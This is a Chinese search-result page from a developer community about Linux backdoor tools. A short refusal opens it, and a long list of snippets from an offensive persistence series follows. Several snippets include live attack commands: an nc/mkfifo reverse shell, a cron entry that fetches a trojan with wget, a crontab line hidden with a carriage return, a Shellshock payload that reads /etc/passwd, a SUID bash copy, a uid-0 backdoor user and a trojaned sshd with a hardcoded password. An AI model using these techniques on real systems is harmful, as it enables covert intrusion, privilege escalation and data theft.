linux后门工具

使用Linux后门工具是不道德且可能违反法律法规和安全策略的行为，因此我不能提供关于Linux后门工具的详细内容。

后门是一种绕过正常认证机制进入系统的途径，被恶意利用时可能导致数据泄露、系统被非法控制等严重安全问题。

合法的安全研究和系统维护工作应通过正规的漏洞管理、安全评估流程来进行，例如使用合法的漏洞扫描工具发现并修复系统中的安全漏洞，而不是借助后门工具。

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

Vim 后门 | Linux 后门系列

环境变量的方式进行配置果然，$VIMRUNTIME 是从 Linux 操作系统的环境变量来的因此永久修改 VIMRUNTIME 不一定会修改 runtimepath ,只有通过Linux...，相信在以后还会对现在写的后门手法进行补充 0x04 vim 自身文件后门这类后门比较简单粗暴，直接替换相关文件，暂时未发现 vim 存在自身使用的 .so 共享库文件，因此本章节以直接替换命令本身为例...制作后门文件 1) 下载源代码在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码在主机B上编辑更新源，取消 deb-src 的注释在主机 B 上下载 vim 源代码（可以指定版本...成功创建了有效的带有后门，且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门成功触发后门 5) 小结几乎每一种后门都可以用这样的方法...+toolbar: 启用工具栏功能。 +user_commands: 启用自定义命令功能。 +vartabs: 启用可变制表符功能。 +vertsplit: 启用垂直分割窗口功能。

7225 1

vim 后门 | Linux 后门系列

$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo....

1.4K2 0

sudo 后门｜Linux 后门系列

sudo 经常被用来将普通用户权限提升至 root 权限，代替 root 执行部分程序来管理 Linux 系统，这样避免 root 密码被泄漏这篇文章介绍了三种利用其留后门的方法，其中也涉及一个sudo...有趣的特性，在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门这篇文章以 Ubuntu Server...22.10 为例 0x01 sudo 配置后门 1) 简介通常的应用场景中，配置 sudo 主要是用来赋予某个用户或者用户组能够以 root(或其他用户) 的身份(以及权限)执行部分(或全部) 程序...空白文件名文件 + alias 劫持的方法来隐藏新建文件有时候也没必要新建用户，可以尝试开启那些系统用户试试，或许有惊喜也说不定，但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门...这个后门更偏向于一个概念性的后门，以趣味性为主吧前段时间复现 CVE-2023-22809 的时候关注到 sudoedit (sudo -e) 这个程序，这个程序用来让可以sudo的用户通过 sudoedit

4671 0

alias后门 | Linux 后门系列

/etc/profile 、 /etc/bashrc 、~/.bashrc、~/.bash_profile 、~/.profile 、~/.bash_logout /etc/profile 【系统级】Linux...我了解了一下，发现 strace 是一个巨牛的工具，堪称神奇，简单来说它是一个调试工具，实际来说，他能把你这个程序在干啥整得明明白白 strace能做什么？...这个时候就可以使用GDB工具了。...把strace的输出单独写到指定的文件 /tmp/sshpwd-xxx.log ，这个没啥好说的 -e read,write,connect Linux内核目前有300多个系统调用，详细的列表可以通过...后门 ?

7.7K3 0

SSH Config 后门｜ Linux 后门系列

Ubuntu server 16.04 默认 /etc/ssh/ssh_config

7.9K4 0

计划任务后门 | Linux 后门系列

Linux 计划任务是一项服务，由 cron 工具来完成，主要目的就是在无需人工干预的情况下运行作业 PS: 功能较为简单的at命令在Ubuntu 16.04中已经不自带了 0x01 cron服务简介...我们来寻找一下这个工具的地址吧！...一会儿再说吧（Linux上万物皆文件，肯定是文件啦！）...3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab

6.9K5 0

修改后门ctime ｜ Linux 后门系列

0x00 前情提要在 alias 后门｜ Linux 后门系列一文中，我们为了让后门完美一些，修改了后门文件的 atime、mtime，但是 ctime 一直没有办法修改，今天我们来把这一块补齐，...让后门更加完美 atime -> access time，访问时间 mtime -> modify time，修改时间 ctime -> change time, 状态变化时间最新版 Linux 中多了一个属性...时间系统分为系统时钟和硬件时钟，系统时钟存在于Linux 内核中，而硬件时钟存在于硬件主板上从两种时钟的命名上可以看出，硬件时钟肯定是要比系统时钟更加持久，毕竟系统时钟系统关机就没了嘛硬件时钟靠着...文件创建时间 Ubuntu Server 22.10 以及 Centos Stream 9 都有文件创建时间这个概念了文件创建时间目前 touch 命令也不支持直接修改，也没有找到其他工具可以改.../etc/update-manager/ 如果是需要执行的后门，现在执行并放置后台，如果像 alias 那种配置文件后门则不需要此章节 /etc/update-manager/release-update

5.8K2 0

LD_PRELOAD 后门 | Linux 后门系列

加固后门正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ?...设置后门后是这样的 ? alias 劫持显示这个简单了，把这些字符替换成空就行了 ?...咱们把劫持 unalias 和劫持 alias 放在最后，先把这些命令都劫持一下： env 没有后门时候是这样的 ? 设置了后门之后是这样的 ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?...劫持成功现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用，那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美！

7.6K2 0

MOTD 后门引发的思考｜ Linux 后门系列

最近看了苑房弘老师的打靶课程，发现了 MOTD 这个东西，于是研究了一下，发现很适合做后门，早在08年以前就有恶意软件使用了这种方式，今天系统地研究一下 motd，全称Message Of The Day...，是Linux中发送问候消息的功能，一般在我们登录服务器后显示每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的，所以很适合用来做后门实用部分随着关注我们的朋友越来越多...root权限留后门这个目录下的所有文件在任意用户登录后都会执行一遍，所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的以 00-header 文件为例 #!...- Linux 命令搜索引擎 https://wangchujiang.com/linux-command/c/trap.html # Construct a user agent, similar to...是如何使策略配置生效的参考 Linux Source Command with Examples https://linuxhint.com/linux-source-command-examples

7.9K0 0

Linux安装后门程序

ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 3、下载并安装ssh后门...：将sshdb.tgz后门程序放置到你自己的服务器的某目录下，并且改成为test.tgz，这里为www.test.com的根目录下 # wget http://www.test.com/test.tgz...# tar zxvf test.tgz # cd openssh 4、设置ssh后门的登录密码： vi includes.h define _SECRET_PASSWD "test1234" ->...#test1234位后门连接密码 5、编译安装： # ....ssh_config touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config 重启服务 # /etc/init.d/sshd restart 6、登入后门

2.3K11 0

权限维持-Linux后门

d在我们攻防当中，常常会碰到linux机器，拿到之后为了避免发现低权限升高权限创建一个c文件 #include int main() { setuid(0);

1.1K1 0

mknod | Linux 后门系列

perl 和 Python 在做反弹shell基本差不多，Python 那一节有点讲的太多了，大家可以对比一下参数，照着Python的思路移到 perl 上，我...

1.1K1 0

rootkit后门检查工具RKHunter

一、概述简介中文名叫”Rootkit猎手”, rkhunter是Linux系统平台下的一款开源入侵检测工具，具有非常全面的扫描范围，除了能够检测各种已知的rootkit特征码以外，还支持端口扫描、常用程序文件的变动情况检查...rootkit是Linux平台下最常见的一种木马后门工具，它主要通过替换系统文件来达到入侵和和隐蔽的目的，这种木马比普通木马后门更加危险和隐蔽，普通的检测工具和检查手段很难发现这种木马。...rootkit攻击能力极强，对系统的危害很大，它通过一套工具来建立后门和隐藏行迹，从而让攻击者保住权限，以使它在任何时候都可以使用root 权限登录到系统。 ...在系统遭受rootkit攻击后，合法的文件被木马程序替代，变成了外壳程序，而其内部是隐藏着的后门程序。...扫描任何混杂模式下的接口和后门程序常用的端口. 7. 检测如/etc/rc.d/目录下的所有配置文件, 日志文件, 任何异常的隐藏文件等等.

4.2K1 0

Linux后门整理合集

UnixBash 远控后门简介利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能，保持反弹上线到公网机器。...nc -vv -lp 53 Linux/Unix 藏文件和文件夹 Linux/Unix 下想藏 Webshell 或者后门什么的，可以利用一下隐藏文件夹和文件。方法一比如创建一个名字开头带 ....利用方法 useradd -o -u 0 backdoor Linux/Unix 修改文件时间戳简介 Unix 下藏后门必须要修改时间，否则很容易被发现，直接利用touch就可以了。...系统环境: dawg:~# uname -a Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux SUID shell...PAM最初是集成在Solaris中，目前已移植到其它系统中，如Linux、SunOS、HP-UX9.0等。搭建PAM后门主要思路：pam_unix_auth.c打补丁安装到正常的PAM模块中。

2K8 0

Linux渗透之Shellshock后门

注入式攻击”也就是可以向 bash注入一段命令，从bash1.14到4.3都存在这样的漏洞; 漏洞编号：CVE-2014-6271 详细情况：Bash(GNU Bourne-Again Shell)是大多数Linux...Bash其广泛的使用将意味全球至少 150 万的主机将受到影响，此外 Linux/Unix 世界内的安卓和苹果都难以幸免。..."() [ test;];echo \"Content-type: text/plain\";echo; echo;/bin/cat /etc/passwd" url 4.Shellshock 利用工具...描述：一个发现并利用服务器 Shellshock 的工具,项目地址: https://github.com/nccgroup/shocker #Help Text usage: shocker.py

1.8K0 0

Linux渗透之Shellshock后门

1.4K2 0

权限维持之Linux后门

在渗透过程中拿到目标权限只是开始，通常会留下后门以便再次访问（简称APT）。因此需要进行权限维持，隐藏后门。本文将对Linux下常见的权限维持后门技术进行解析，知己知彼百战不殆。...">>/etc/passwd #Aalv…为第一行命令执行结果 2.设置suid权限位原理：设置了suid权限位的文件在执行时具有该文件拥有者的权限，故我们可以在root权限时留一个bash文件后门...，使得在低权限时能够通过该后门获得root权限 cp /bin/bash /tmp/test chmod 4755 /tmp/test #或者chmod u+s /tmp/test /tmp/test...（不通操作系统文件不同） 4.写入SSH公钥原理：Linux主机打开了SSH时默认也开启了密钥登陆，故写入ssh公钥，即可留下一条控制系统的路 ssh-keygen -t rsa #生成ssh密钥对...则会修改目录下root文件，也相当于crontab -e 还有许多其它执行计划任务的文件及相关文件 11.预加载动态链接库原理：系统执行一些命令的时候，在真正执行其文件之前，会加载相应的动态链接库，但linux

2.1K2 0

Linux 后门系列之 python3 反弹shell & 隐藏后门

On Debian GNU/{Hurd,Linux} the default for both is /usr....所以思路来了：要保证我们后门的名字和模块的名字一样我们的后门路径要优先被索引最好名称能正常一点或者以 ....等特殊字符开头按照这个思路，我们可以从 /usr/lib/python3.5/plat-x86_64-linux-gnu 目录开始搜索 ?...没想到 /usr/lib/python3.5/ 目录下还有一个跟这个文件名类似的文件，简直不要太好，我们看看文件内容，好决定怎么留后门，截取一小部分 ? ?...在 /usr/lib/python3.5/plat-x86_64-linux-gnu/ 创建 STYLE.py ?

2K2 0

nc 反弹shell | Linux 后门系列

---- 关于nc之前文章就已经讲过了，不过我发现不同 linux 的nc不太一样 ?...原理其实就是管道技术参考文章： https://www.cnblogs.com/old-path-white-cloud/p/11685558.html 本来我对自己的Linux知识还是挺有信心的，不过最近研究了这些...Linux 后门之后发现我竟然对这些命令有些犹豫（其实就是学艺不精啦）我对这个 rm -f /tmp/f 就十分不理解，实验之后我发现，没错，就是删除 /tmp/f 这个文件，没啥特殊的，就是怕mkfifo...mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.38 5555 > /tmp/f ---- 本来我想如果加上 -k 选项是不是可以做一个持久后门

3.1K3 0

制作linux键盘记录后门

—鲁迅介绍 strace是一个动态跟踪工具，它可以跟踪系统调用的执行。...我们可以把他当成一个键盘记录的后门，来扩大我们的信息收集范围使用场景通过其他方式拿到shell,通过history、流量抓包、或者本地没有翻到密码的情况。

3.4K5 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

linux后门工具

相关·内容

Vim 后门 | Linux 后门系列

vim 后门 | Linux 后门系列

sudo 后门｜Linux 后门系列

alias后门 | Linux 后门系列

SSH Config 后门｜ Linux 后门系列

计划任务后门 | Linux 后门系列

修改后门ctime ｜ Linux 后门系列

LD_PRELOAD 后门 | Linux 后门系列

MOTD 后门引发的思考｜ Linux 后门系列

Linux安装后门程序

权限维持-Linux后门

mknod | Linux 后门系列

rootkit后门检查工具RKHunter

Linux后门整理合集

Linux渗透之Shellshock后门

Linux渗透之Shellshock后门

权限维持之Linux后门

Linux 后门系列之 python3 反弹shell & 隐藏后门

nc 反弹shell | Linux 后门系列

制作linux键盘记录后门

扫码

相关资讯

热门标签

活动推荐

运营活动

社区

活动

资源

关于

腾讯云开发者

热门产品

热门推荐

更多推荐